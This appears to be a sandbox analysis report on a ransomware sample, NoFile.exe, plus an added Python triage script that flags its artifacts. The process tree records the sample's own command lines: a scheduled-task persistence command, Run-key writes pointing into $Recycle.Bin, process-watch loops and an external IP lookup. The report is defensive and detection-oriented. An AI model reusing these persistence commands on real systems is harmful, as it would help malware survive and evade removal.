Analysis
max time kernel: 151s
max time network: 138s
platform: windows10-2004_x64
resource: win10v2004-en-20220112
submitted: 06-02-2022 09:18
Static task: static1
Behavioral task: behavioral1 (sample NoFile.exe, resource win7-en-20211208)
Behavioral task: behavioral2 (sample NoFile.exe, resource win10v2004-en-20220112)
General
Target: NoFile.exe
Size: 2.2MB
MD5: 7d1ed67b77f47ba8aadf9a3ac7d0c371
SHA1: a598e6708c189caeef1fa76064feb4d0155abb3d
SHA256: 87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
SHA512: 17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9
Malware Config
Signatures
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery. The report lists no command line for the deletion; the WMIC.exe and vssvc.exe token activity under "Suspicious use of AdjustPrivilegeToken" below is consistent with it.
Modifies Windows Firewall (1 TTPs)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check. Both queries come from the cmd.exe and WScript.exe hosts rather than from NoFile.exe itself, so they may also be ordinary locale initialisation by those hosts; treat this hit as weak on its own.
Processes: cmd.exe, WScript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | WScript.exe
Drops startup file (2 IoCs)
Processes: NoFile.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | NoFile.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | NoFile.exe
Adds Run key to start application (2 TTPs, 4 IoCs)
Processes: reg.exe (two instances)
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" | reg.exe
The same value, Machin_Update, is written under both HKLM and HKCU. The HKLM write landing under WOW6432Node shows the writer was a 32-bit process on a 64-bit system. No write to c:\$Recycle.Bin\RCRU_64.exe appears among the file IoCs in this report, so check that path directly when triaging a host; $Recycle.Bin is a hidden system folder that a default Explorer view does not show, which is the point of staging a payload there.
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: NoFile.exe
NoFile.exe opened (read-only) the root of every drive letter from A: to Z: except C: and D:, once as an upper-case letter and once as a lower-case letter (\??\A: ... \??\Z: and \??\a: ... \??\z:), 48 opens in total.
Drops file in Program Files directory (64 IoCs)
Processes: NoFile.exe
The list stops at exactly 64 entries, as do two other signatures on this page, so 64 is a display cap and the true count is higher. Two kinds of activity appear: the ransom note Read_Me!_.txt is created once per directory, and existing files of every type (DLLs, EXEs, MUI resources, JARs, HTML, plain text, data files) are opened for modification, which is what in-place encryption looks like in this log.
Ransom note created (File created, 13 entries):
\??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\Read_Me!_.txt
\??\c:\Program Files\Common Files\microsoft shared\ink\sl-SI\Read_Me!_.txt
\??\c:\Program Files\Common Files\microsoft shared\Source Engine\Read_Me!_.txt
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\Read_Me!_.txt
\??\c:\Program Files\Common Files\microsoft shared\VGX\Read_Me!_.txt
\??\c:\Program Files\Common Files\System\ado\de-DE\Read_Me!_.txt
\??\c:\Program Files\Common Files\microsoft shared\VSTO\Read_Me!_.txt
\??\c:\Program Files\Common Files\System\es-ES\Read_Me!_.txt
\??\c:\Program Files\Common Files\System\Ole DB\de-DE\Read_Me!_.txt
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\Read_Me!_.txt
\??\c:\Program Files\Common Files\System\ado\ja-JP\Read_Me!_.txt
\??\c:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\Read_Me!_.txt
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\Read_Me!_.txt
Existing files opened for modification (51 entries):
\??\c:\Program Files\Common Files\System\Ole DB\msdasql.dll
\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\dtplugin\npdeployJava1.dll
\??\c:\Program Files\7-Zip\Lang\eo.txt
\??\c:\Program Files\7-Zip\Lang\gu.txt
\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\cpprestsdk.dll
\??\c:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html
\??\c:\Program Files\Internet Explorer\fr-FR\iexplore.exe.mui
\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\jawt.dll
\??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data
\??\c:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe
\??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA
\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll
\??\c:\Program Files\Common Files\microsoft shared\ink\en-US\tipresx.dll.mui
\??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad.xml
\??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml
\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\instrument.dll
\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\javafx_font.dll
\??\c:\Program Files\7-Zip\Lang\id.txt
\??\c:\Program Files\7-Zip\Lang\mk.txt
\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe
\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe
\??\c:\Program Files\7-Zip\Lang\uz.txt
\??\c:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sk.pak
\??\c:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe
\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sk-sk.dll
\??\c:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html
\??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\jvm.hprof.txt
\??\c:\Program Files\7-Zip\Lang\es.txt
\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\AppVOrchestration.dll
\??\c:\Program Files\Common Files\microsoft shared\ink\it-IT\TabTip.exe.mui
\??\c:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui
\??\c:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui
\??\c:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui
\??\c:\Program Files\Google\Chrome\Application\89.0.4389.114\89.0.4389.114.manifest
\??\c:\Program Files\7-Zip\descript.ion
\??\c:\Program Files\Common Files\microsoft shared\ink\fr-FR\TipRes.dll.mui
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar
\??\c:\Program Files\7-Zip\Lang\af.txt
\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp140.dll
\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml
\??\c:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml
\??\c:\Program Files\Common Files\microsoft shared\ink\it-IT\tipresx.dll.mui
\??\c:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP
\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\jaas_nt.dll
\??\c:\Program Files\Common Files\microsoft shared\ink\cs-CZ\tipresx.dll.mui
Drops file in Windows directory (4 IoCs)
Processes: NoFile.exe, svchost.exe, TiWorker.exe
description | ioc | process
File created | C:\Windows\Pagesfilo.sys | NoFile.exe
File opened for modification | C:\Windows\Pagesfilo.sys | NoFile.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat | svchost.exe
File opened for modification | C:\Windows\Logs\CBS\CBS.log | TiWorker.exe
Only the first two entries belong to the sample. The svchost.exe (Delivery Optimization) and TiWorker.exe (Windows Modules Installer) entries are routine Windows servicing activity that shows up in most sandbox runs. Pagesfilo.sys sits directly in C:\Windows, is written by a user-mode program and carries a driver-like extension; nothing in this report shows it being loaded as a driver, so treat it as a data or payload file of unknown purpose until it is examined.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: MusNotifyIcon.exe
description | ioc | process
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MusNotifyIcon.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | MusNotifyIcon.exe
The only process hitting this signature is MusNotifyIcon.exe, a Windows Update notification component, not the sample or anything in its process tree, so this is background noise rather than evidence of sandbox evasion.
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution. The process tree below shows the task: "Microsoft_Auto_Scheduler", which runs C:\Users\Admin\AppData\t2_svc.bat every 6 minutes (schtasks /create /sc minute /mo 6 ... /f), so the batch stage is re-run even if the original executable is removed.
Delays execution with timeout.exe (10 IoCs)
Processes (PIDs): timeout.exe 228, 3084, 3144, 3468, 1508, 3388, 2868, 3500, 3780, 2984
Enumerates processes with tasklist (1 TTPs, 11 IoCs)
Processes (PIDs): tasklist.exe 3680, 1356, 1588, 1932, 1556, 1748, 2060, 3912, 3012, 3532, 2364
Gathers system information (1 TTPs, 2 IoCs)
Runs systeminfo.exe.
Processes (PIDs): systeminfo.exe 3324, 616
Kills process with taskkill (40 IoCs)
Processes (PIDs): taskkill.exe 2180, 1668, 3988, 2708, 1556, 3584, 2872, 3588, 2148, 3004, 312, 1584, 1748, 796, 2944, 1580, 2912, 2080, 2968, 1260, 3496, 3008, 3260, 2572, 2780, 2064, 3516, 3388, 1276, 2784, 3480, 644, 1184, 1560, 2760, 3936, 4068, 3076, 632, 1136
None of the 40 taskkill.exe command lines appear in the process tree shown on this page, so which processes were targeted cannot be recovered from it.
Modifies data under HKEY_USERS (47 IoCs)
Processes: svchost.exe
All 47 entries are writes by svchost.exe under \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization (S-1-5-20 is NETWORK SERVICE, the account the Delivery Optimization service runs as). This is the service's own bookkeeping and is unrelated to the sample. Relative to that key:
Key created: the key itself, Usage, Settings, Config
Config: DownloadMode_BackCompat = 1, KVFileExpirationTime = 132887891186226019, DODownloadMode = 1, Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo", GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"
Usage (int, all 0 unless noted): UploadMonthlyInternetBytes, DownloadMonthlyLinkLocalBytes, LANConnectionCount, DownlinkUsageBps, UplinkUsageBps, DownloadMonthlyRateBkBps, PeerInfoCount, LinkLocalConnectionCount, PriorityDownloadPendingCount, NormalDownloadCount, MemoryUsageKB = 3984 then 4124, DownloadMonthlyLanBytes, DownloadMonthlyCacheHostBytes, DownloadMonthlyRateFrCnt, CDNConnectionCount, BkDownloadRatePct = 45, NormalDownloadPendingCount, GroupConnectionCount, UplinkBps, DownloadMonthlyRateBkCnt, UploadMonthlyLanBytes, CacheSizeBytes, PriorityDownloadCount, DownloadMonthlyGroupBytes, DownloadMonthlyRateFrBps, SwarmCount = 1, UploadRatePct = 100, MonthlyUploadRestriction, UploadCount, DownloadMonthlyInternetBytes, DownloadMonthlyCdnBytes, MonthID = 2, InternetConnectionCount, DownlinkBps, FrDownloadRatePct = 90
Usage (str): CPUpct = "6.818211" then "0.000000"
Modifies registry class (1 IoCs)
Processes: cmd.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | cmd.exe
Modifies registry key (1 TTPs, 3 IoCs)
(No IoC details are listed on this page for this signature.)
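An added example, not part of the sandbox report or of the sample, that performs the triage implied by the file and registry signatures above over a constructed subset of this report's IoCs: it sets aside the Windows background noise (svchost.exe Delivery Optimization, TiWorker.exe, MusNotifyIcon.exe), flags the Run value pointing into $Recycle.Bin, the Startup-folder executable and the .sys file dropped in C:\Windows, and applies two frequency rules that catch the ransom-note drop and the encryption pass without any file-name signature. The BACKGROUND allowlist, the thresholds and the rule names are my assumptions; the event paths are copied from this page, with 5 of the 13 ransom notes and 6 of the 51 modified files standing in for the full lists.

```python
"""Triage of file/registry artifacts from a sandbox run.

Added example, not part of the sandbox report. EVENTS is a constructed subset of
the report's IoCs; the BACKGROUND allowlist and thresholds are assumptions.
"""
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArtifactEvent:
    process: str   # image basename as the report prints it
    action: str    # "File created", "File opened for modification", "Set value", ...
    path: str      # file path (NT \??\ prefix allowed) or registry key/value path
    data: str = "" # registry data for Set value, as printed (backslashes doubled)


# Windows components seen in nearly every sandbox run and the paths they are
# expected to touch; anything else they do is still triaged like other events.
BACKGROUND = {
    "svchost.exe": (r"\\DeliveryOptimization\\",),
    "TiWorker.exe": (r"\\Logs\\CBS\\CBS\.log$",),
    "MusNotifyIcon.exe": (r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\",),
}
RUN_KEY = re.compile(r"(?i)\\Software\\(WOW6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run\\")
UNTRUSTED_EXEC_DIR = re.compile(
    r"(?i)^[a-z]:\\(\$Recycle\.Bin|Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\")
STARTUP_EXEC = re.compile(r"(?i)\\Start Menu\\Programs\\Startup\\[^\\]+\.(exe|bat|cmd|vbs|js|scr)$")
WINDOWS_ROOT_SYS = re.compile(r"(?i)^[a-z]:\\Windows\\[^\\]+\.sys$")


def is_background(ev):
    return any(re.search(p, ev.path) for p in BACKGROUND.get(ev.process, ()))


def triage(events, note_dirs=5, mass_dirs=5, mass_exts=3):
    """Return (rule, process, detail) tuples for the events not filtered as noise."""
    findings = []
    created = defaultdict(set)                      # (process, basename) -> directories
    modified = defaultdict(lambda: (set(), set()))  # process -> (directories, extensions)
    for ev in events:
        if is_background(ev):
            continue
        path = ev.path[4:] if ev.path.startswith("\\??\\") else ev.path
        if ev.action == "Set value" and RUN_KEY.search(path):
            target = ev.data.strip('"').replace("\\\\", "\\")
            if UNTRUSTED_EXEC_DIR.search(target):
                findings.append(("run_key_to_untrusted_dir", ev.process, f"{path} -> {target}"))
            if "wow6432node" in path.lower():   # 32-bit writer on a 64-bit system
                findings.append(("run_key_written_by_32bit_process", ev.process, path))
        elif ev.action == "File created":
            if STARTUP_EXEC.search(path):
                findings.append(("startup_folder_executable", ev.process, path))
            elif WINDOWS_ROOT_SYS.search(path):
                findings.append(("sys_file_in_windows_root", ev.process, path))
            directory, name = ntpath.split(path)
            created[(ev.process, name.lower())].add(directory.lower())
        elif ev.action == "File opened for modification":
            directory, name = ntpath.split(path)
            dirs, exts = modified[ev.process]
            dirs.add(directory.lower())
            exts.add(ntpath.splitext(name)[1].lower())
    # Frequency rules: one file name dropped into many directories is the ransom-note
    # pattern; one process rewriting many file types in many directories is the
    # encryption pass itself. Neither depends on knowing the note's name.
    for (proc, name), dirs in created.items():
        if len(dirs) >= note_dirs:
            findings.append(("same_named_file_in_many_dirs", proc, f"{name} in {len(dirs)} directories"))
    for proc, (dirs, exts) in modified.items():
        if len(dirs) >= mass_dirs and len(exts) >= mass_exts:
            findings.append(("mass_file_modification", proc, f"{len(dirs)} directories, {len(exts)} extensions"))
    return findings


PF = r"\??\c:\Program Files"
EVENTS = [  # constructed from the report's IoC lists
    ArtifactEvent("NoFile.exe", "File created", r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe"),
    ArtifactEvent("reg.exe", "Set value", r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update", r'"c:\\$Recycle.Bin\\RCRU_64.exe"'),
    ArtifactEvent("reg.exe", "Set value", r"\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Machin_Update", r'"c:\\$Recycle.Bin\\RCRU_64.exe"'),
    ArtifactEvent("NoFile.exe", "File created", r"C:\Windows\Pagesfilo.sys"),
    ArtifactEvent("NoFile.exe", "File created", PF + r"\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\Read_Me!_.txt"),
    ArtifactEvent("NoFile.exe", "File created", PF + r"\Common Files\microsoft shared\ink\sl-SI\Read_Me!_.txt"),
    ArtifactEvent("NoFile.exe", "File created", PF + r"\Common Files\microsoft shared\Source Engine\Read_Me!_.txt"),
    ArtifactEvent("NoFile.exe", "File created", PF + r"\Common Files\microsoft shared\VGX\Read_Me!_.txt"),
    ArtifactEvent("NoFile.exe", "File created", PF + r"\Common Files\System\ado\de-DE\Read_Me!_.txt"),
    ArtifactEvent("NoFile.exe", "File opened for modification", PF + r"\Common Files\System\Ole DB\msdasql.dll"),
    ArtifactEvent("NoFile.exe", "File opened for modification", PF + r"\Java\jdk1.8.0_66\jre\bin\dtplugin\npdeployJava1.dll"),
    ArtifactEvent("NoFile.exe", "File opened for modification", PF + r"\7-Zip\Lang\eo.txt"),
    ArtifactEvent("NoFile.exe", "File opened for modification", PF + r"\Java\jdk1.8.0_66\jre\COPYRIGHT"),
    ArtifactEvent("NoFile.exe", "File opened for modification", PF + r"\Google\Chrome\Application\89.0.4389.114\Locales\sk.pak"),
    ArtifactEvent("NoFile.exe", "File opened for modification", PF + r"\Internet Explorer\fr-FR\iexplore.exe.mui"),
    ArtifactEvent("svchost.exe", "File opened for modification", r"C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat"),
    ArtifactEvent("svchost.exe", "Set value", r"\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct", '"6.818211"'),
    ArtifactEvent("TiWorker.exe", "File opened for modification", r"C:\Windows\Logs\CBS\CBS.log"),
    ArtifactEvent("MusNotifyIcon.exe", "Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz"),
]

if __name__ == "__main__":
    for rule, proc, detail in triage(EVENTS):
        print(f"{rule:34} {proc:14} {detail}")
```

The two frequency rules are the ones worth keeping in a detection pipeline: a note name like Read_Me!_.txt changes between families, but "same small file in N directories" and "one process touching N directories and M extensions in a short window" do not.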
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes (PIDs): tasklist.exe 3012 (twice), 1556 (twice)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: tasklist.exe, TiWorker.exe, WMIC.exe, vssvc.exe, taskkill.exe
Grouped by process (the raw list is capped at 64 entries):
tasklist.exe (PIDs 3012, 1556, 3532, 1748, 2060, 3680): SeDebugPrivilege
taskkill.exe (PIDs 3496, 3076, 3008, 3516, 1560, 3480, 644, 3004, 3260, 1748): SeDebugPrivilege
TiWorker.exe (PID 832): SeSecurityPrivilege, SeRestorePrivilege, SeBackupPrivilege
WMIC.exe (PID 2172), the full set enabled twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the privilege LUIDs 33, 34, 35, 36 that the sandbox left unresolved (in winnt.h these are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege)
vssvc.exe (PID 3896): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
Reading this: tasklist and taskkill enable SeDebugPrivilege on every run, and TiWorker.exe is Windows servicing. WMIC.exe enables every privilege its token holds at start-up regardless of the query it then runs, so the long list is not itself the signal; what matters is that WMIC.exe ran at all (no WMIC command line appears in this report) and that vssvc.exe, the Volume Shadow Copy service, became active in the same run, which fits the "Deletes shadow copies" signature above.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: NoFile.exe, cmd.exe, WScript.exe
Every target is a direct child the parent had just started, so these entries reflect ordinary process creation rather than injection into an existing process. Each parent/child pair is logged three times; the pairs, listed once, in report order (the raw list is capped at 64 entries, which is why the last pair appears only once):
3436 NoFile.exe -> 3064 cmd.exe
3064 cmd.exe -> 3012 tasklist.exe
3064 cmd.exe -> 1952 findstr.exe
3436 NoFile.exe -> 3484 cmd.exe
3436 NoFile.exe -> 3444 cmd.exe
3444 cmd.exe -> 3516 WScript.exe
3436 NoFile.exe -> 3888 cmd.exe
3888 cmd.exe -> 1276 schtasks.exe
3436 NoFile.exe -> 536 cmd.exe
536 cmd.exe -> 2868 nslookup.exe
3516 WScript.exe -> 4052 cmd.exe
3516 WScript.exe -> 804 cmd.exe
3436 NoFile.exe -> 3912 cmd.exe
3436 NoFile.exe -> 2628 cmd.exe
2628 cmd.exe -> 3324 systeminfo.exe
2628 cmd.exe -> 1576 find.exe
804 cmd.exe -> 1556 tasklist.exe
804 cmd.exe -> 3260 find.exe
804 cmd.exe -> 3780 timeout.exe
3436 NoFile.exe -> 1004 cmd.exe
1004 cmd.exe -> 616 systeminfo.exe
1004 cmd.exe -> 3796 find.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NoFile.exe"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
- C:\Windows\SysWOW64\WScript.exe (tree level 3)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe (tree level 4)
  Command line: C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
- C:\Windows\SysWOW64\cmd.exe (tree level 4)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /v
  - Enumerates processes with tasklist
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I /c "dcdcf"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\tasklist.exe (tree level 5)
  Command line: tasklist /fi "ImageName eq NoFile.exe" /fo csv
  - Enumerates processes with tasklist
- C:\Windows\SysWOW64\find.exe (tree level 5)
  Command line: find /I "NoFile.exe"
- C:\Windows\SysWOW64\timeout.exe (tree level 5)
  Command line: timeout /t 15 /nobreak
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\schtasks.exe (tree level 3)
  Command line: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
  - Creates scheduled task(s)
- C:\Windows\SysWOW64\cmd.exe (tree level 2)
  Command line: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
  - Suspicious use of WriteProcessMemory
